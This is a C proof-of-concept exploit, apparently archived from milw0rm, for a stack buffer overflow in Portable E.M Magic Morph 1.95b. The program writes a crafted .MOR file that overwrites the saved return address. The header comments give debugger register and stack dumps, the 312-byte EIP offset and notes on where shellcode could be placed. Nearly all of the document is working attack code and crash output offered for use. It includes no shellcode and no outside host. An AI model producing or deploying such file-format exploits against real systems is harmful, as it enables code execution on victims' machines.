/*********************************************************************
Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC *
By fl0 fl0w *
"can't stop me/my time is now/your time is up/MY TIME IS NOW !!!!" *
**********************************************************************
/********************************************************************************************************
The EIP offset is at 312 bytes 0x138 HEX *
After you compile and create the .MOR file ,edit it with HEX EDITOR and start counting from the start *
of the file, and you will arrive at the result of 0x138 bytes *
*
I used a technique named "stack spray" to determine the offset. *
*
CPU REGISTERS *
EAX 00000000 *
ECX 33333333 *
EDX 01492288 *
EBX 00000001 *
*
ESP 0012EF7C ASCII "444bbbbbbbbbbbgggggggggggggggggbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa *
````````````````````````````````````````````````YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY *
XXXXXXXXXXXXXXXXcccccccccccccccccccccccccccccccc2222222223 *
EBP 0012F3CC ASCII "````````````````````````````````````````````````YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY *
YYYYYYYYYYYYYYYYXXXXXXXXXXXXXXXXcccccccccccccccccccccccccccccccc2222222223333333333fffffAAAAww44444b *
bbbbbbbbbbgggggggggggggggggbaaaaaaaaaaaaaaaaaaaaaaaaaa *
*
ESI 00F369B0 *
EDI 00F369B0 *
EIP 41414141 *
*
We control ECX and EIP, which is more than enough to copy whatever addresses you want into memory. *
So in OLLYDBG I go to the ESP register, right click -> Follow in Stack, and observe that the corruption*
starts at a much lower address. *
This is what ESP points to: *
********************************************************************************************************
*/
/************************
STACK *
0012EF7C 62343434 *
0012EF80 62626262 *
0012EF84 62626262 *
0012EF88 67676262 *
0012EF8C 67676767 *
0012EF90 67676767 *
0012EF94 67676767 *
0012EF98 62676767 *
0012EF9C 61616161 *
0012EFA0 61616161 *
0012EFA4 61616161 *
0012EFA8 61616161 *
0012EFAC 61616161 *
0012EFB0 61616161 *
0012EFB4 61616161 *
0012EFB8 61616161 *
0012EFBC 61616161 *
0012EFC0 61616161 *
0012EFC4 61616161 *
0012EFC8 61616161 *
0012EFCC 60606060 *
0012EFD0 60606060 *
0012EFD4 60606060 *
0012EFD8 60606060 *
0012EFDC 60606060 *
0012EFE0 60606060 *
0012EFE4 60606060 *
0012EFE8 60606060 *
0012EFF0 60606060 *
0012EFF4 60606060 *
0012EFF8 60606060 *
0012EFFC 59595959 *
0012F000 59595959 *
0012F004 59595959 *
0012F008 59595959 *
0012F00C 59595959 *
..................... *
***********************
*/
/*************************************************
You can copy your shellcode starting from here : *
0012EC3C 63636363 *
*
0x12EF80 = 1240960 ->NOT-> A *
*
0x12EC3C = 1240124 ->NOT-> B *
*
A > B *
A - B = 836 = 0x344 *
So the stack gets corrupted a long way from ESP.*
*************************************************
*/
/*************************************************
LOOK OF THE DUMP *
0012EE4C 63 63 63 63 cccc *
0012EE54 63 63 63 63 63 63 63 63 cccccccc *
0012EE5C 32 32 32 32 32 32 32 32 22222222 *
0012EE64 32 33 33 33 33 33 33 33 23333333 *
0012EE6C 33 33 33 66 66 66 66 66 333fffff *
0012EE74 41 41 41 41 77 77 34 34 AAAAww44 *
0012EE7C 34 34 34 62 62 62 62 62 444bbbbb *
0012EE84 62 62 62 62 62 62 67 67 bbbbbbgg *
0012EE8C 67 67 67 67 67 67 67 67 gggggggg *
0012EE94 67 67 67 67 67 67 67 62 gggggggb *
0012EE9C 61 61 61 61 61 61 61 61 aaaaaaaa *
0012EEA4 61 61 61 61 61 61 61 61 aaaaaaaa *
0012EEAC 61 61 61 61 61 61 61 61 aaaaaaaa *
0012EEB4 61 61 61 61 61 61 61 61 aaaaaaaa *
0012EEBC 61 61 61 61 61 61 61 61 aaaaaaaa *
0012EEC4 61 61 61 61 61 61 61 61 aaaaaaaa *
0012EECC 60 60 60 60 60 60 60 60 ```````` *
0012EED4 60 60 60 60 60 60 60 60 ```````` *
0012EEDC 60 60 60 60 60 60 60 60 ```````` *
0012EEE4 60 60 60 60 60 60 60 60 ```````` *
0012EEEC 60 60 60 60 60 60 60 60 ```````` *
0012EEF4 60 60 60 60 60 60 60 60 ```````` *
0012EEFC 59 59 59 59 59 59 59 59 YYYYYYYY *
0012EF04 59 59 59 59 59 59 59 59 YYYYYYYY *
0012EF0C 59 59 59 59 59 59 59 59 YYYYYYYY *
0012EF14 59 59 59 59 59 59 59 59 YYYYYYYY *
0012EF1C 59 59 59 59 59 59 59 59 YYYYYYYY *
0012EF24 59 59 59 59 59 59 59 59 YYYYYYYY *
0012EF2C 58 58 58 58 58 58 58 58 XXXXXXXX *
0012EF34 58 58 58 58 58 58 58 58 XXXXXXXX *
0012EF3C 63 63 63 63 63 63 63 63 cccccccc *
0012EF44 63 63 63 63 63 63 63 63 cccccccc *
0012EF4C 63 63 63 63 63 63 63 63 cccccccc *
0012EF54 63 63 63 63 63 63 63 63 cccccccc *
0012EF5C 32 32 32 32 32 32 32 32 22222222 *
0012EF64 32 33 33 33 33 33 33 33 23333333 *
0012EF6C 33 33 33 66 66 66 66 66 333fffff *
0012EF74 41 41 41 41 77 77 34 34 AAAAww44 *
0012EF7C 34 34 34 62 62 62 62 62 444bbbbb *
0012EF84 62 62 62 62 62 62 67 67 bbbbbbgg *
0012EF8C 67 67 67 67 67 67 67 67 gggggggg *
0012EF94 67 67 67 67 67 67 67 62 gggggggb *
0012EF9C 61 61 61 61 61 61 61 61 aaaaaaaa *
0012EFA4 61 61 61 61 61 61 61 61 aaaaaaaa *
0012EFAC 61 61 61 61 61 61 61 61 aaaaaaaa *
0012EFB4 61 61 61 61 61 61 61 61 aaaaaaaa *
0012EFBC 61 61 61 61 61 61 61 61 aaaaaaaa *
0012EFC4 61 61 61 61 61 61 61 61 aaaaaaaa *
0012EFCC 60 60 60 60 60 60 60 60 ```````` *
0012EFD4 60 60 60 60 60 60 60 60 ```````` *
0012EFDC 60 60 60 60 60 60 60 60 ```````` *
0012EFE4 60 60 60 60 60 60 60 60 ```````` *
0012EFEC 60 60 60 60 60 60 60 60 ```````` *
0012EFF4 60 60 60 60 60 60 60 60 ```````` *
0012EFFC 59 59 59 59 59 59 59 59 YYYYYYYY *
0012F004 59 59 59 59 59 59 59 59 YYYYYYYY *
0012F00C 59 59 59 59 59 59 59 59 YYYYYYYY *
*************************************************
*/
/**************************************************************************************
Hello to all my buddies from insecurity.ro ,skullbox.info ,renslt.org *
Special greetz to OSHO,!_30,str0ke,Carcabot. *
Visit my website for more bugs, papers, exploits, pocs and programming techniques. *
http://www.sploitz.10001mb.com *
*************************************************************************************
*/
/*************************************************************************
DEMO *
C:\Documents and Settings\Stefan\Desktop\magic moth poc>mm.exe *
********************************************************************* *
Magic Morph .MOR File Stack Buffer Overflow POC *
The usage is: *
All Credits fl0 fl0w *
*
-f FILE.mor *
**************************************************************************
*
C:\Documents and Settings\Stefan\Desktop\magic moth poc>mm.exe -f TEST *
File DONE ! *
**************************************************************************
*/
/*****************************************************************************************
Technical details *
This program was compiled with DEV-Cpp and tested with success on MS Windows Xp Sp3 *
You can download the POC along with debugging details from my website *
Preview ... *
...... *
This folder contains two screenshots from the ollydbg debugging session, the poc(MM.CPP)*
and the software Portable E.M Magic Morph 1.95b. *
ALL CREDITS GO TO fl0 fl0w for this exploit ! *
http://www.sploitz.10001mb.com/ *
........................... *
******************************************************************************************
*/
//START Algorithm
#include "stdio.h"
#include "string.h"
#include "stdlib.h"
#include "windows.h"
#include "stdint.h"
#include "getopt.h"
/*
 * Three-byte record holding the "C:\" drive prefix that buildFile() writes
 * ahead of the first path string of the .MOR image.  The fields a, b, c are
 * the three bytes in file order; no padding is involved (three 1-byte members).
 */
struct flo {
    uint8_t a;
    uint8_t b;
    uint8_t c;
};
typedef struct flo F;
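/*
 * Write the fixed .MOR byte image to `fname` (created or truncated, binary mode).
 *
 * The output is entirely constant (1016 bytes): a 3-byte "C:\" prefix, then
 * the three constant chunks hexfileP1..hexfileP3.  hexfileP1 opens with the
 * rest of an ASCII path, is zero-padded, and then runs into the repeated
 * filler bytes (0x41, 0x63, 0x32, ...) that the header comments describe as
 * the marker pattern used to locate the overwritten return address;
 * hexfileP3 carries a second zero-padded path.  Nothing in this function
 * depends on its input beyond the output file name.
 *
 * fname: path of the file to create.
 * Returns nothing (original signature).  On an I/O failure the failing path
 * is reported with perror() and the function returns early, so a partially
 * written file may remain on disk.
 *
 * Fixes relative to the first version: the 3-byte prefix was built in a
 * malloc()ed struct that was copied with sizeof(pointer) -- an over-read of
 * the 3-byte heap object -- and never freed; fopen()/fwrite()/fclose() were
 * unchecked, so a missing directory or full disk went unnoticed.
 */
void buildFile(char *fname)
{
    /* Chunks are static const: they never change and no longer occupy ~1 KiB of stack. */
    static const uint8_t hexfileP1[] =
    {
        0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x20, 0x61, 0x6E, 0x64,
        0x20, 0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x53, 0x74, 0x65, 0x66, 0x61, 0x6E,
        0x5C, 0x4D, 0x79, 0x20, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x5C, 0x4D, 0x73,
        0x20, 0x73, 0x75, 0x70, 0x72, 0x65, 0x6D, 0x63, 0x79, 0x30, 0x30, 0x30, 0x2E, 0x6A, 0x70, 0x67,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
        0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
        0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
        0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63,
        0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63,
        0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63,
        0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33,
        0x33, 0x33, 0x33, 0x66, 0x66, 0x66, 0x66, 0x66, 0x41, 0x41, 0x41, 0x41, 0x77, 0x77, 0x34, 0x34,
        0x34, 0x34, 0x34, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x67, 0x67,
        0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x62,
    };
    static const uint8_t hexfileP2[] = {
        0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,
        0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,
        0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,
        0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60,
        0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60,
        0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60,
        0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59,
        0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59,
        0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59,
        0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58,
        0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58,
        0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58,
        0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58,
        0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
        0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
        0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
        0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
        0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
        0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
        0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
    };
    static const uint8_t hexfileP3[] = {
        0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,
        0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x43, 0x3A, 0x5C, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73,
        0x20, 0x61, 0x6E, 0x64, 0x20, 0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x53, 0x74,
        0x65, 0x66, 0x61, 0x6E, 0x5C, 0x4D, 0x79, 0x20, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74,
        0x73, 0x5C, 0x72, 0x6F, 0x6E, 0x61, 0x6C, 0x64, 0x6F, 0x2D, 0x62, 0x72, 0x61, 0x7A, 0x69, 0x6C,
        0x2D, 0x77, 0x61, 0x6C, 0x6C, 0x70, 0x61, 0x70, 0x65, 0x72, 0x2E, 0x6A, 0x70, 0x67, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    } ;
    /* "C:\" -- the first three bytes of the file; hexfileP1 continues the same path string. */
    static const uint8_t header[3] = { 0x43, 0x3A, 0x5C };

    /* Emit the pieces in file order; sizes are taken from the arrays, not hard-coded. */
    const uint8_t *chunks[] = { header, hexfileP1, hexfileP2, hexfileP3 };
    const size_t sizes[] = { sizeof header, sizeof hexfileP1, sizeof hexfileP2, sizeof hexfileP3 };

    FILE *f = fopen(fname, "wb");
    if (f == NULL) {
        perror(fname);
        return;
    }
    for (size_t i = 0; i < sizeof chunks / sizeof chunks[0]; i++) {
        if (fwrite(chunks[i], 1, sizes[i], f) != sizes[i]) {
            perror(fname);
            fclose(f);
            return;
        }
    }
    /* fclose() flushes; a failure here means the tail of the image did not reach disk. */
    if (fclose(f) != 0) {
        perror(fname);
    }
}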
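/*
 * Validate the command line with getopt(3).
 *
 * Accepts `-f FILE`; any other option, or -f without its argument, is
 * rejected with exit(-1) as in the original.  The parsed value is not
 * returned: the function is void and main() reads argv[2] directly without
 * calling this helper, so the name is deliberately discarded here.
 *
 * argc, argv: the program's arguments, passed through unchanged
 *             (getopt may permute argv on GNU systems).
 *
 * Fixes relative to the first version: the loop was guarded by `if(a)` on an
 * uninitialized int (undefined behaviour, so the parse might never run), the
 * option string "f" declared no argument for -f (optarg was always NULL), and
 * the optarg pointer was truncated into an int.
 */
void args(int argc, char *argv[])
{
    int opt;
    /* getopt is documented to return -1 at the end, not EOF. */
    while ((opt = getopt(argc, argv, "f:")) != -1) {
        switch (opt) {
        case 'f':
            /* optarg holds FILE; see the note above on why it is not stored. */
            break;
        default:
            /* Unknown option or missing argument; getopt has already printed a message. */
            exit(-1);
        }
    }
}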
/*
 * Print the banner and credit lines to stdout.
 * Name: argv[0]; accepted for signature compatibility but not used.
 */
void Usage (char *Name)
{
    (void)Name;
    /* CLS is the Windows console-clear command.  The argument is a constant
       literal, so no caller-controlled text reaches system(). */
    system("CLS");
    fputs("*********************************************************************\n", stdout);
    fputs("\t\tPortable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC\n", stdout);
    fputs("The usage is:\n", stdout);
    fputs("\t\tAll Credits fl0 fl0w\n", stdout);
}
/* Print the option summary (the single -f FILE.mor option) to stderr. */
void Menu()
{
    static const char text[] =
        "\n"
        "\t-f FILE.mor\n"
        "*********************************************************************"
        "\n";
    fputs(text, stderr);
}
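/*
 * Entry point: `mm -f NAME` writes NAME.mor via buildFile().
 *
 * Exits with -1 (after printing the banner and option summary) when the
 * arguments do not match the documented form, or when NAME would not fit
 * in the local buffer together with the ".mor" suffix.
 *
 * Fixes relative to the first version: argv[2] was read whenever argc >= 2
 * (a NULL dereference for `mm NAME`), the name was copied into a 100-byte
 * stack buffer with strcpy()/strcat() -- an unbounded copy in the generator
 * itself -- and the documented -f flag was never checked.  `argc` is now the
 * standard `int` rather than int32_t.
 */
int main(int argc, char *argv[])
{
    if (argc < 3 || strcmp(argv[1], "-f") != 0) {
        Usage(argv[0]);
        Menu();
        exit(-1);
    }
    char b[100];
    /* snprintf always NUL-terminates; a return >= sizeof b means the name was truncated. */
    int n = snprintf(b, sizeof b, "%s.mor", argv[2]);
    if (n < 0 || (size_t)n >= sizeof b) {
        fprintf(stderr, "file name too long (max %zu characters)\n", sizeof b - sizeof ".mor");
        exit(-1);
    }
    buildFile(b);
    printf("File DONE !\n");
    return 0;
}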
//END Algorithm
// milw0rm.com [2009-09-14]